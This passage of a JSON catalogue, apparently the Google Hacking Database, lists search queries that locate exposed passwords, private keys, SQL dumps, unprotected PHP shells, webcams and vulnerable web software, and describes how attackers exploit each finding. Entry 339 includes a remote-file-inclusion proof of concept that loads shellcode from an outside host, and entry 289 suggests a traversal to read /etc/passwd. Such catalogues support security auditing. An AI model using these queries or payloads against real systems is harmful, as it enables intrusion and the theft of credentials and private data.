Readers can browse through the messages written by other people and reply to those messages. This search reveals the server software, server os, server account user:group (unix), and the server administrator email address. Many of these messages also include a traceback of the files and linenumbers and a listing of the cgi ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files.", "submited": "2004-06-15", "request": "intitle:\"Error using Hypernews\" \"Server Software\"", "id": 287}, {"short description": "filetype:cfg ks intext:rootpw -sample -test -howto", "long description": "Anaconda is a linux configuration tool like yast on suse linux. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.There are more ks configs then you might expect and with a bit of searching through the result list an attacker can find the root password and own that system.", "submited": "2004-06-14", "request": "filetype:cfg ks intext:rootpw -sample -test -howto", "id": 288}, {"short description": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", "long description": "Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --> will show you the my_howto.txt).An attacker can check for buggy php scripts wich allow you to view any file on the system (with webservers permissions). Try the good, old directory traversal trick: \"../../../\". 
You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?).", "submited": "2004-06-16", "request": "filetype:php inurl:\"viewfile\" -\"index.php\" -\"idfil", "id": 289}, {"short description": "allinurl:\".nsconfig\" -sample -howto -tutorial", "long description": "Access to a Web server's content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content).", "submited": "2004-06-18", "request": "allinurl:\".nsconfig\" -sample -howto -tutorial", "id": 290}, {"short description": "Outlook Web Access (a better way)", "long description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. 
\" Now, consider for a moment and you will understand why this could be potentially bad.", "submited": "2004-06-18", "request": "inurl:\"exchange/logon.asp\" OR intitle:\"Microsoft Outlook Web Access - Logon\"", "id": 291}, {"short description": "OWA Public folders & Address book", "long description": "This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.An attacker can use the addressbook to enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation.", "submited": "2004-06-19", "request": "inurl:root.asp?acs=anon", "id": 292}, {"short description": "Looking Glass", "long description": "A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.An attacker use this to gather information about the network.", "submited": "2004-06-22", "request": "\"Looking Glass\" (inurl:\"lg/\" | inurl:lookingglass)", "id": 293}, {"short description": "CGI:IRC Login", "long description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else.", "submited": "2004-06-22", "request": "filetype:cgi inurl:\"irc.cgi\" | intitle:\"CGI:IRC Login\"", "id": 294}, {"short description": "filetype:ctt ctt messenger", "long description": "MSN Messenger uses the file extension *.ctt when you export the contact list. 
An attacker could use this for social engineering tricks.", "submited": "2004-06-22", "request": "filetype:ctt ctt messenger", "id": 295}, {"short description": "intitle:\"Error Occurred While Processing Request\" +WHERE (SELECT|INSERT) filetype:cfm", "long description": "Cold fusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver. An attacker could use this information to quickly find SQL injection points.", "submited": "2004-06-24", "request": "intitle:\"Error Occurred While Processing Request\"", "id": 296}, {"short description": "ht://Dig htsearch error", "long description": "The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publicly available sites that use ht://Dig is available at http://www.htdig.org/uses.html. ht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system. If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions.", "submited": "2004-06-24", "request": "intitle:\"htsearch error\" ht://Dig error", "id": 297}, {"short description": "VP-ASP Shopping Cart XSS", "long description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything. According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. 
A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:\"VP-ASP Shopping Cart *\" -\"5.0\" to find unpatched servers.", "submited": "2004-06-25", "request": "filetype:asp inurl:\"shopdisplayproducts.asp\"", "id": 298}, {"short description": "Unreal IRCd", "long description": "Development of UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).This search finds configuration files to Unreal IRCd. An attacker can use these to possibly determine the oper passwd. Be warned that there are samples in the results.", "submited": "2004-07-06", "request": "filetype:conf inurl:unrealircd.conf -cvs -gentoo", "id": 299}, {"short description": "OWA Public Folders (direct view)", "long description": "This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different, it just depends which link Google has crawled.An attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social enginering tricks.", "submited": "2004-06-25", "request": "inurl:/public/?Cmd=contents", "id": 300}, {"short description": "VP-ASP Shop Administrators only", "long description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. 
It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything. It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQL injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html", "submited": "2004-06-25", "request": "inurl:\"shopadmin.asp\" \"Shop Administrators only\"", "id": 301}, {"short description": "Microsoft Money Data Files", "long description": "Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny. A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called \"Passware\".", "submited": "2004-07-02", "request": "filetype:mny mny", "id": 302}, {"short description": "Environment vars", "long description": "This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc.", "submited": "2004-07-02", "request": "HTTP_USER_AGENT=Googlebot", "id": 303}, {"short description": "MySQL tabledata dumps", "long description": "SQL database dumps. LOTS of data in these. So much data, in fact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper..... Note: this is a cleanup version of an older googledork entry.", "submited": "2004-07-06", "request": "\"# Dumping data for table (username|user|users|password)\"", "id": 304}, {"short description": "Welcome to ntop!", "long description": "Ntop shows the current network usage. 
It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host. An attacker may use this to gather information about hosts and services behind the firewall.", "submited": "2004-07-06", "request": "intitle:\"Welcome to ntop!\"", "id": 305}, {"short description": "vBulletin version 3.0.1 newreply.php XSS", "long description": "vBulletin is a customizable forums package for web sites. It has been written in PHP and is complimented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not Edit-panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/.", "submited": "2004-07-02", "request": "\"Powered by: vBulletin * 3.0.1\" inurl:newreply.php", "id": 306}, {"short description": "psyBNC config files", "long description": "psyBNC is an IRC-Bouncer with many features. It compiles on Linux, FreeBSD, SunOs and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).An attacker can use the password, host and portinformation in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy irc hostname that are usually linked to those IP addresses.", "submited": "2004-07-06", "request": "filetype:conf inurl:psybnc.conf \"USER.PASS=\"", "id": 307}, {"short description": "intitle:\"View and Configure PhaserLink\"", "long description": "These printer's configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! 
=)", "submited": "2004-07-08", "request": "intitle:\"View and Configure PhaserLink\"", "id": 308}, {"short description": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", "long description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.", "submited": "2004-07-09", "request": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", "id": 309}, {"short description": "filetype:php inurl:\"webeditor.php\"", "long description": "This is a standard login portal for the webadmin program.", "submited": "2004-07-09", "request": "filetype:php inurl:\"webeditor.php\"", "id": 310}, {"short description": "Panasonic Network Cameras", "long description": "Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/There is a htaccess protected admin page at \"http://[target-ip]/config.html\" on the target device. Admin logins have no defaults, but created during setup.", "submited": "2004-07-10", "request": "inurl:\"ViewerFrame?Mode=\"", "id": 311}, {"short description": "sony SNC-RZ30 Network Cameras", "long description": "sony NC RZ30 camera's require a java capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html.", "submited": "2004-07-10", "request": "sNC-RZ30 HOME", "id": 312}, {"short description": "seyeon FlexWATCH cameras", "long description": "seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCH Network video server series has built-in Web server based on TCP/IP technology. 
It also has an embedded RTOS. The admin pages are at http://[sitename]/admin/aindex.htm.", "submited": "2004-07-10", "request": "intitle:flexwatch intext:\"Home page ver\"", "id": 313}, {"short description": "sony SNC-RZ20 network cameras", "long description": "sony NC RZ20 cameras, only one result for this cam at the moment, a nice street view from a skyscraper.", "submited": "2004-07-10", "request": "intitle:snc-z20 inurl:home/", "id": 314}, {"short description": "Mobotix netcams", "long description": "Mobotix netcams use the thttpd-2.x. server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality. Moderator note: this search was found by L0om and cleaned up by Wolveso.", "submited": "2004-07-10", "request": "(intext:\"MOBOTIX M1\" | intext:\"MOBOTIX M10\") intext:\"Open Menu\" Shift-Reload", "id": 315}, {"short description": "Panasonic WJ-NT104 netcams", "long description": "The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp", "submited": "2004-07-10", "request": "intitle:\"WJ-NT104 Main Page\"", "id": 316}, {"short description": "exported email addresses", "long description": "Loads of user information including email addresses exported in comma separated file format (.csv). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation.", "submited": "2004-07-12", "request": "e-mail address filetype:csv csv", "id": 317}, {"short description": "phpWebMail", "long description": "PhpWebMail is a php webmail system that supports imap or pop3. It has been reported that PHPwebmail 2.3 is vulnerable. The vulnerability allows phpwebmail users to gain access to arbitrary file system by changing the parameters in the URL used for sending mail (send_mail.php). 
More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html.", "submited": "2004-07-12", "request": "filetype:php login (intitle:phpWebMail|WebMail)", "id": 318}, {"short description": "Invision Power Board SSI.PHP SQL Injection", "long description": "Invision Power Board is reported prone to an SQL injection vulnerability in its ssi.php script. Due to improper filtering of user supplied data, ssi.php is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.More info: http://www.securityfocus.com/bid/10511/info/", "submited": "2004-07-12", "request": "\"Powered by Invision Power Board(U) v1.3 Final\"", "id": 319}, {"short description": "Analysis Console for Incident Databases", "long description": "ACID stands for for \"Analysis Console for Incident Databases\". It is a php frontend for the snort intrusion detection system database.These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, ip addresses, network layout, existance of firewall and IDS systems, and more.", "submited": "2004-07-12", "request": "ACID \"by Roman Danyliw\" filetype:php", "id": 320}, {"short description": "Index of phpMyAdmin", "long description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. 
Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields (http://sourceforge.net/projects/phpmyadmin/).An attacker can use this search to find phpMyAdmin enabled MySQL servers by using the \"index of /\" method. Consider this an alternative way an attacker could find them besides the older Googledorks for phpMyAdmin.", "submited": "2004-07-12", "request": "intitle:\"index of /phpmyadmin\" modified", "id": 321}, {"short description": "Comersus.mdb database", "long description": "Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&-click interface.This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well know security sites for Comersus reveals more security problems.", "submited": "2004-07-12", "request": "inurl:\"/database/comersus.mdb\"", "id": 322}, {"short description": "Public PHP FileManagers", "long description": "PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user. The built-in login system makes sure that only people with the right username and password gains access to PHPFM, however, you can also choose to disable the login system and use PHPFM for public access. It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages. This search finds those \"public\" versions of PHPFM. 
An attacker can use them to manage his own files (phpshell anyone ?).PS: thanks to j0hnny for the public access angle :)", "submited": "2004-07-12", "request": "\"Powered by PHPFM\" filetype:php -username", "id": 323}, {"short description": "private key files (.key)", "long description": "This search will find private key files... Private key files are supposed to be, well... private.", "submited": "2004-07-12", "request": "BEGIN (CERTIFICATE|DSA|RSA) filetype:key", "id": 324}, {"short description": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", "long description": "Filemanager without authentication.", "submited": "2004-10-31", "request": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", "id": 325}, {"short description": "private key files (.csr)", "long description": "This search will find private key files... Private key files are supposed to be, well... private.", "submited": "2004-07-12", "request": "BEGIN (CERTIFICATE|DSA|RSA) filetype:csr", "id": 326}, {"short description": "PHP Shell (unprotected)", "long description": "PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbiritary shell-commands or browse the filesystem on your remote Web server. This replaces, to a degree, a normal telnet-connection. You can use it for administration and maintenance of your Web site using commands like ps, free, du, df, and more.If these shells aren't protected by some form of authentication, an attacker will basicly *own* the server. This search finds such unprotected phpshells by looking for the keyword \"enable stderr\".", "submited": "2004-07-12", "request": "intitle:\"PHP Shell *\" \"Enable stderr\" filetype:php", "id": 327}, {"short description": "NickServ registration passwords", "long description": "NickServ allows you to \"register\" a nickname (on some IRC networks) and prevent others from using it. 
Some channels also require you to use a registered nickname to join.This search contains the the nickserv response message to a nick registration. Lots of example sites, but some that aren't... you can see which ones are fake or not in the search (some are like, your_password, while other are more realistic ones).", "submited": "2004-07-12", "request": "\"Your password is * Remember this for later use\"", "id": 328}, {"short description": "Red Hat Unix Administration", "long description": "Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server.", "submited": "2004-07-12", "request": "intitle:\"Page rev */*/*\" inurl:\"admin", "id": 329}, {"short description": "inurl:ssl.conf filetype:conf", "long description": "The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways.", "submited": "2004-07-15", "request": "inurl:ssl.conf filetype:conf", "id": 330}, {"short description": "PHP application warnings failing \"include_path\"", "long description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006).", "submited": "2004-07-14", "request": "PHP application warnings failing \"include_path\"", "id": 331}, {"short description": "\"Internal Server Error\" \"server at\"", "long description": "We have a similar search already, but it relies on \"500 Internal Server\" which doesn't appear on all errors like this one. 
It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code.", "submited": "2004-07-16", "request": "\"Internal Server Error\" \"server at\"", "id": 332}, {"short description": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", "long description": "LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed. Please note that all searches for configuration files will contain at least some false positives.", "submited": "2004-07-16", "request": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", "id": 333}, {"short description": "filetype:php inurl:\"logging.php\" \"Discuz\" error", "long description": "Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements).", "submited": "2004-07-16", "request": "filetype:php inurl:\"logging.php\" \"Discuz\" error", "id": 334}, {"short description": "intitle:\"Microsoft Site Server Analysis\"", "long description": "Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however. 
An attacker may use these reports to gather information about the directory structure and possibly identify script files.", "submited": "2004-07-16", "request": "intitle:\"Microsoft Site Server Analysis\"", "id": 335}, {"short description": "intitle:\"Index of\" passwords modified", "long description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This is a cleanup of a previous googledork, improving the results by using \"intitle\" and an extra keyword from the index page (in this case modified).", "submited": "2004-07-16", "request": "intitle:\"Index of\" passwords modified", "id": 336}, {"short description": "index.of.password", "long description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This googledork has expired ! See also:http://johnny.ihackstuff.com/index.php?module=ProdReviews&func=showcontent&id=380", "submited": "2004-07-16", "request": "index.of.password", "id": 337}, {"short description": "\"powered by webcamXP\" \"Pro|Broadcast\"", "long description": "webcamXP PRO:http://www.webcamxp.com/productsadv.htmlThis is the most advanced version of the software. 
It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online.", "submited": "2004-07-16", "request": "\"powered by webcamXP\" \"Pro|Broadcast\"", "id": 338}, {"short description": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", "long description": "dork: \"powered by sphider\" a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/", "submited": "2006-04-15", "request": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", "id": 339}, {"short description": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", "long description": "dork: \"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\" this is for PHP Web Statistik script, you can go to: http://[target]/[path_to]/log/logdb.dta to see clear text logs", "submited": "2006-04-15", "request": "\"by Reimar Hoven. All Rights Reserved. Disclaimer\" | inurl:\"log/logdb.dta\"", "id": 340}, {"short description": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", "long description": "In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources.", "submited": "2004-07-16", "request": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", "id": 341}, {"short description": "intitle:\"Live View / - AXIS\"", "long description": "These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. 
The devices ship with a default password pair (quoting from the FAQ): \"By default, the username will be *knowed* and the password will be *knowed* (see original source). If these are not the current values, performing a factory default on the unit will reset the password to *knowed*.\"Some models found in this search:- AXIS 205 version 4.0x- AXIS 210 Network Camera version: 4.0x- AXIS 241S Video Server version: 4.0x- AXIS 241Q Video Server version 4.0x", "submited": "2004-07-19", "request": "intitle:\"Live View / - AXIS\"", "id": 342}, {"short description": "\"sets mode: +p\"", "long description": "This search reveals private channels on IRC as revealed by IRC chat logs.", "submited": "2004-07-19", "request": "\"sets mode: +p\"", "id": 343}, {"short description": "\"sets mode: +k\"", "long description": "This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.", "submited": "2004-07-19", "request": "\"sets mode: +k\"", "id": 344}, {"short description": "\"sets mode: +s\"", "long description": "This search reveals secret channels on IRC as revealed by IRC chat logs.", "submited": "2004-07-19", "request": "\"sets mode: +s\"", "id": 345}, {"short description": "intitle:\"BorderManager Information alert\"", "long description": "This is an Informational message produced by the Novell BorderManager firewall/proxy server. Attackers can located perimeter defence systems with this query.", "submited": "2004-07-19", "request": "intitle:\"BorderManager Information alert\"", "id": 346}, {"short description": "\"AnWeb/1.42h\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. 
Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"AnWeb/1.42h\" intitle:index.of", "id": 347}, {"short description": "\"CERN httpd 3.0B (VAX VMS)\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"CERN httpd 3.0B (VAX VMS)\"", "id": 348}, {"short description": "\"JRun Web Server\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"JRun Web Server\" intitle:index.of", "id": 349}, {"short description": "\"MaXX/3.1\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"MaXX/3.1\" intitle:index.of", "id": 350}, {"short description": "\"Microsoft-IIS/* server at\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. 
Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/* server at\" intitle:index.of", "id": 351}, {"short description": "\"Microsoft-IIS/4.0\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/4.0\" intitle:index.of", "id": 352}, {"short description": "\"Microsoft-IIS/5.0 server at\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/5.0 server at\"", "id": 353}, {"short description": "\"Microsoft-IIS/6.0\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Microsoft-IIS/6.0\" intitle:index.of", "id": 354}, {"short description": "\"OmniHTTPd/2.10\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. 
Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"OmniHTTPd/2.10\" intitle:index.of", "id": 355}, {"short description": "\"OpenSA/1.0.4\" intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"OpenSA/1.0.4\" intitle:index.of", "id": 356}, {"short description": "\"Red Hat Secure/2.0\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Red Hat Secure/2.0\"", "id": 357}, {"short description": "\"Red Hat Secure/3.0 server at\"", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"Red Hat Secure/3.0 server at\"", "id": 358}, {"short description": "sEDWebserver * server +at intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. 
Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "sEDWebserver * server +at intitle:index.of", "id": 359}, {"short description": "fitweb-wwws * server at intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "fitweb-wwws * server at intitle:index.of", "id": 360}, {"short description": "\"httpd+ssl/kttd\" * server at intitle:index.of", "long description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.", "submited": "2004-07-19", "request": "\"httpd+ssl/kttd\" * server at intitle:index.of", "id": 361}, {"short description": "Xerox Phaser 6250", "long description": "Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&W (24ppm A4 Color/B&W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature SetPassword not allways needed it seems, depends on admin setup..", "submited": "2004-07-22", "request": "\"Phaser 6250\" \"Printer Neighborhood\" \"XEROX CORPORATION\"", "id": 362}, {"short description": "Xerox Phaser 740 Color Printer", "long description": "This product is supported but no longer sold by Xerox in the United States. 
Replacement Product: Phaser (see in orig) 6250.Configuration pages are password protected.", "submited": "2004-07-22", "request": "\"Phaser 740 Color Printer\" \"printer named: \"", "id": 363}, {"short description": "Xerox Phaser 8200", "long description": "Brochure info: \"The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer.\" Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required.\"Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use.", "submited": "2004-07-22", "request": "\"Phaser 8200\" \" Xerox\" \"refresh\" \" Email Alerts\"", "id": 364}, {"short description": "Xerox Phaser 840 Color Printer", "long description": "This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaser 8400 This search finds the PhaserLinkTM Printer Management Software for the Phaser 840 Color Printer. It seems at least the \"Print DEMO\" page works without authentication.", "submited": "2004-07-22", "request": "\"Phaser 840 Color Printer\" \"Current Status\" \"printer named:\"", "id": 365}, {"short description": "\"index of\" / picasa.ini", "long description": "Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. 
This search allows the voyer to browse directories of photos uploaded using the picasa software.", "submited": "2004-07-20", "request": "\"index of\" / picasa.ini", "id": 366}, {"short description": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", "long description": "Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).", "submited": "2004-07-20", "request": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", "id": 367}, {"short description": "intitle:\"index of\" +myd size", "long description": "The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm. An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.", "submited": "2004-07-21", "request": "intitle:\"index of\" +myd size", "id": 368}, {"short description": "filetype:cnf my.cnf -cvs -example", "long description": "The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from pathes, databasenames up to passwords and usernames.Beware this search still gives false positives (examples, templates).", "submited": "2004-07-21", "request": "filetype:cnf my.cnf -cvs -example", "id": 369}, {"short description": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", "long description": "hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. 
